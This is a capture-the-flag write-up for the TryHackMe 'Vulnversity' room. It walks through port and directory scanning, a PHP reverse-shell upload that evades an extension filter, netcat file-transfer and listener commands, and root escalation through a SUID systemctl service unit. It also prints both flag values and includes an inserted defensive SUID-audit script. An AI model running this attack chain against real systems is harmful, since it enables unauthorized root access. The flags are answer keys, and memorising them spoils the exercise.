# TryHackMe - Vulnversity Writeup
https://tryhackme.com/room/vulnversity
- [x] Recon
- [x] Exploit
- [x] Access
- [x] Priv Esc
## Recon
`nmap -sV 10.10.87.163`
```bash
Starting Nmap 7.80 ( https://nmap.org ) at 2022-10-23 22:51 JST
Nmap scan report for 10.10.87.163
Host is up (0.39s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0)
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
3128/tcp open http-proxy Squid http proxy 3.5.12
3333/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: VULNUNIVERSITY; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 64.44 seconds
```
## Exploit
The website is served on http://10.10.87.163:3333
`gobuster -u http://10.10.87.163:3333 -w ~/wordlist/SecLists/Discovery/Web-Content/common.txt`
```bash
=====================================================
Gobuster v2.0.1 OJ Reeves (@TheColonial)
=====================================================
[+] Mode : dir
[+] Url/Domain : http://10.10.87.163:3333/
[+] Threads : 10
[+] Wordlist : /home/ping/wordlist/SecLists/Discovery/Web-Content/common.txt
[+] Status codes : 200,204,301,302,307,403
[+] Timeout : 10s
=====================================================
2022/10/23 23:01:44 Starting gobuster
=====================================================
/.hta (Status: 403)
/.htpasswd (Status: 403)
/.htaccess (Status: 403)
/css (Status: 301)
/fonts (Status: 301)
/images (Status: 301)
/index.html (Status: 200)
/internal (Status: 301)
```
`/internal` hosts a file upload form.
The room guide tells us to build a wordlist of possible PHP extensions.

We try each of them and find that `.phtml` is allowed.
## Access
Using the reverse shell from [this repo](https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php), we catch the connection back and gain a shell on the server.
From there we find a user called "bill", and the user flag is `8bd7992fbe8a6ad22a63361004cfcedb`:
```bash
$ cd home
$ ls
bill
$ cd bill
$ ls
user.txt
$ cat user.txt
8bd7992fbe8a6ad22a63361004cfcedb
```
## PrivEsc
Find files with the SUID bit set:
Reference: https://www.geeksforgeeks.org/finding-files-with-suid-and-sgid-permissions-in-linux/
`find / -user root -perm -4000 -exec ls -ldb {} \; >/tmp/list.txt`
```bash
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 49584 May 16 2017 /usr/bin/chfn
-rwsr-xr-x 1 root root 32944 May 16 2017 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 May 16 2017 /usr/bin/chsh
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 23376 Jan 15 2019 /usr/bin/pkexec
-rwsr-xr-x 1 root root 39904 May 16 2017 /usr/bin/newgrp
-rwsr-xr-x 1 root root 75304 May 16 2017 /usr/bin/gpasswd
-rwsr-sr-x 1 root root 98440 Jan 29 2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 14864 Jan 15 2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 428240 Jan 31 2019 /usr/lib/openssh/ssh-keysign
-rwsr-xr-x 1 root root 10232 Mar 27 2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 root root 76408 Jul 17 2019 /usr/lib/squid/pinger
-rwsr-xr-- 1 root messagebus 42992 Jan 12 2017 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 38984 Jun 14 2017 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-x 1 root root 40128 May 16 2017 /bin/su
-rwsr-xr-x 1 root root 142032 Jan 28 2017 /bin/ntfs-3g
-rwsr-xr-x 1 root root 40152 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 44680 May 7 2014 /bin/ping6
-rwsr-xr-x 1 root root 27608 May 16 2018 /bin/umount
-rwsr-xr-x 1 root root 659856 Feb 13 2019 /bin/systemctl
-rwsr-xr-x 1 root root 44168 May 7 2014 /bin/ping
-rwsr-xr-x 1 root root 30800 Jul 12 2016 /bin/fusermount
-rwsr-xr-x 1 root root 35600 Mar 6 2017 /sbin/mount.cifs
```
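As an added defender-side check, not part of the original writeup: a listing like the one above is only useful if something unusual stands out, and `/bin/systemctl` carrying the setuid bit is exactly the kind of anomaly a baseline comparison catches. The Python below (my own example) parses `ls -ld` lines like those above and reports root-owned setuid binaries missing from an assumed baseline set; both the baseline and the sample lines are constructed for illustration.

```python
import re

# Constructed sample: five lines copied from the find/ls listing above.
SAMPLE_LISTING = """\
-rwsr-xr-x 1 root root 136808 Jul 4 2017 /usr/bin/sudo
-rwsr-xr-x 1 root root 54256 May 16 2017 /usr/bin/passwd
-rwsr-xr-x 1 root root 40128 May 16 2018 /bin/mount
-rwsr-xr-x 1 root root 659856 Feb 13 2019 /bin/systemctl
-rwsr-sr-x 1 root root 98440 Jan 29 2019 /usr/lib/snapd/snap-confine
"""

# Illustrative baseline (an assumption, not a vetted list) of binaries that normally
# carry setuid root on Ubuntu 16.04; a real audit would derive it from package metadata.
BASELINE_SUID = {
    "/usr/bin/sudo", "/usr/bin/passwd", "/usr/bin/chfn", "/usr/bin/chsh",
    "/usr/bin/gpasswd", "/usr/bin/newgrp", "/usr/bin/pkexec", "/bin/su",
    "/usr/lib/snapd/snap-confine", "/bin/mount", "/bin/umount", "/bin/ping",
    "/bin/ping6", "/bin/fusermount",
}

# One `ls -ld` line: mode, links, owner, group, size, three date fields, path.
# Paths containing whitespace are not matched and are skipped.
LS_RE = re.compile(
    r"^(?P<mode>[-a-zA-Z]{10})\s+\d+\s+(?P<owner>\S+)\s+(?P<group>\S+)"
    r"\s+\d+\s+\S+\s+\d+\s+\S+\s+(?P<path>\S+)$"
)

def parse_ls_line(line):
    """Return path/owner/setuid/setgid for one listing line, or None if it does not parse."""
    m = LS_RE.match(line.strip())
    if m is None:
        return None
    mode = m.group("mode")
    return {
        "path": m.group("path"),
        "owner": m.group("owner"),
        "setuid": mode[3] in "sS",  # user execute slot reads 's' when setuid is set
        "setgid": mode[6] in "sS",  # group execute slot reads 's' when setgid is set
    }

def audit_suid(listing, baseline=BASELINE_SUID):
    """Return root-owned setuid paths missing from the baseline, in listing order."""
    findings = []
    for line in listing.splitlines():
        entry = parse_ls_line(line)
        if entry and entry["setuid"] and entry["owner"] == "root" \
                and entry["path"] not in baseline:
            findings.append(entry["path"])
    return findings
```

Run against the full `/tmp/list.txt` from the box, the same function would flag every root-owned setuid path outside the baseline, so the baseline must be kept honest against the distribution's package manifests.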
Since `/bin/systemctl` is SUID root (see the listing above), we use the `root.service` unit from [here](https://gist.github.com/A1vinSmith/78786df7899a840ec43c5ddecb6a4740) to escalate privileges to root.
We transfer the file with netcat from our machine to the server's rev shell:
On the rev shell: `nc -vl 44444 > root.service`
On our machine: `nc -n 10.10.87.163 44444 < root.service`, then start a netcat listener on port 9999.
Finally, on the rev shell:
```bash
/bin/systemctl enable /tmp/root.service
/bin/systemctl start root
```
We then get a root shell on the netcat listener. The root flag is `a58ff8579f0a9270368d33a9966c7fd5`:
```bash
root@vulnuniversity:/# cd root
cd root
root@vulnuniversity:~# ls
ls
root.txt
root@vulnuniversity:~# cat root.txt
cat root.txt
a58ff8579f0a9270368d33a9966c7fd5
```